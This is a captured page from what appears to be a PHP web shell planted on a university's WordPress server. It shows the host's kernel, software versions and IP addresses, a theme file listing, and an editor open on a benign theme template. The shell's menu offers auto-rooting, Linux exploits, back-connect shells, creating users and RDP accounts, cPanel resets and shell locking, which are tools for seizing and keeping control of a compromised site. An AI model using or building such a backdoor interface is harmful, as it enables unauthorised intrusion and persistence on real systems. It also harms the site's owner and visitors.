Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 52.14.60.56
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
appadmin /
cesa2025 /
wp-content /
themes /
jannah /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxr-x
buddypress
[ DIR ]
drwxrwxr-x
demos
[ DIR ]
drwxrwxr-x
framework
[ DIR ]
drwxrwxr-x
inc
[ DIR ]
drwxrwxr-x
languages
[ DIR ]
drwxrwxr-x
plugins
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
404.php
1.41
KB
-rw-rw-r--
archive-web-story.php
1.11
KB
-rw-rw-r--
archive.php
1.38
KB
-rw-rw-r--
author.php
1.42
KB
-rw-rw-r--
buddypress.php
816
B
-rw-rw-r--
category.php
3.89
KB
-rw-rw-r--
comments.php
1.52
KB
-rw-rw-r--
footer.php
404
B
-rw-rw-r--
functions.php
4.5
KB
-rw-rw-r--
header.php
681
B
-rw-rw-r--
index.php
1.05
KB
-rw-rw-r--
page.php
590
B
-rw-rw-r--
rtl.css
39.93
KB
-rw-rw-r--
screenshot.jpg
60.18
KB
-rw-rw-r--
search.php
1.45
KB
-rw-rw-r--
sidebar-footer.php
2.85
KB
-rw-rw-r--
sidebar-shop.php
751
B
-rw-rw-r--
sidebar-slide.php
4.07
KB
-rw-rw-r--
sidebar.php
2.42
KB
-rw-rw-r--
single.php
359
B
-rw-rw-r--
style.css
704
B
-rw-rw-r--
tag.php
1.42
KB
-rw-rw-r--
template-authors.php
230
B
-rw-rw-r--
template-masonry.php
377
B
-rw-rw-r--
template-sitemap.php
227
B
-rw-rw-r--
wpml-config.xml
7.11
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sidebar-slide.php
<?php /** * The template for the sidebar containing the slide widget area * */ defined( 'ABSPATH' ) || exit; // Exit if accessed directly if( ! apply_filters( 'TieLabs/is_header_active', true ) ){ return; } // General Variables $slide_sidebar_desktop = $slide_sidebar_mobile = false; // Main Classes $classes = array( 'side-aside', 'normal-side' ); // Slide Sidebar if( tie_get_option( 'side_aside_skin') == 'light' ){ $classes[] = 'light-skin'; } else{ $classes[] = 'dark-skin'; $classes[] = 'dark-widgetized-area'; } // Check if it is active on desktop if( ( tie_get_option( 'top_nav' ) && tie_get_option( 'top-nav-components_slide_area' ) ) || ( tie_get_option( 'main_nav' ) && tie_get_option( 'main-nav-components_slide_area' ) ) ){ $slide_sidebar_desktop = true; $classes[] = 'slide-sidebar-desktop'; } // Check if it is active on mobile if( tie_get_option( 'mobile_header_components_menu' ) ){ $slide_sidebar_mobile = true; $classes[] = tie_get_option( 'mobile_menu_layout' ) == 'fullwidth' ? 'is-fullwidth' : ''; $classes[] = tie_get_option( 'mobile_header_components_menu' ) == 'area_1' ? 'appear-from-left' : 'appear-from-right'; $search_position = tie_get_option( 'mobile_menu_search_position' ) == 'top' ? 'top' : 'bottom'; } $classes = join( ' ', apply_filters( 'TieLabs/slide_sidebar/classes', array_filter( $classes ) ) ) ; // -- if( $slide_sidebar_desktop || $slide_sidebar_mobile ) : ?> <aside class=" <?php echo esc_attr( $classes ) ?>" aria-label="<?php esc_html_e( 'Secondary Sidebar', TIELABS_TEXTDOMAIN ); ?>" style="visibility: hidden;"> <div data-height="100%" class="side-aside-wrapper has-custom-scroll"> <a href="#" class="close-side-aside remove big-btn"> <span class="screen-reader-text"><?php esc_html_e( 'Close', TIELABS_TEXTDOMAIN ); ?></span> </a><!-- .close-side-aside /--> <?php if( $slide_sidebar_mobile ){ ?> <div id="mobile-container"> <?php // Search on Top if( tie_get_option( 'mobile_menu_search' ) && $search_position == 'top' ){ ?> <div id="mobile-search"> <?php if( tie_get_option( 'google_search_engine_id' ) ){ tie_google_search(); } else{ get_search_form(); } ?> </div><!-- #mobile-search /--> <?php } // Menu Classes $class = ! tie_get_option( 'mobile_menu_icons' ) ? 'hide-menu-icons' : ''; // Mobile Menu $mobile_menu = tie_get_object_option( 'mobile_the_menu', 'cat_menu', 'tie_menu' ); if( ! empty( $mobile_menu ) && $mobile_menu != 'main-secondary' ){ $class .= ' has-custom-menu'; } ?> <div id="mobile-menu" class="<?php echo esc_attr( $class ) ?>"> <?php if( ! empty( $mobile_menu ) && $mobile_menu != 'main-secondary' ){ wp_nav_menu( array( 'menu' => $mobile_menu, 'walker' => new TIELABS_MEGA_MENU(), 'items_wrap' => '<ul id="mobile-custom-menu" class="%2$s">%3$s</ul>', )); } ?> </div><!-- #mobile-menu /--> <?php // Social Networks if( tie_get_option( 'mobile_menu_social' ) ){ ?> <div id="mobile-social-icons" class="social-icons-widget solid-social-icons"> <?php tie_get_social(); ?> </div><!-- #mobile-social-icons /--> <?php } // Search if( tie_get_option( 'mobile_menu_search' ) && $search_position == 'bottom' ){ ?> <div id="mobile-search"> <?php if( tie_get_option( 'google_search_engine_id' ) ){ tie_google_search(); } else{ get_search_form(); } ?> </div><!-- #mobile-search /--> <?php } ?> </div><!-- #mobile-container /--> <?php } ?> <?php if( ! tie_is_mobile() && $slide_sidebar_desktop ){ ?> <div id="slide-sidebar-widgets"> <?php dynamic_sidebar( 'slide-sidebar-area' ); ?> </div> <?php } ?> </div><!-- .side-aside-wrapper /--> </aside><!-- .side-aside /--> <?php endif;
Close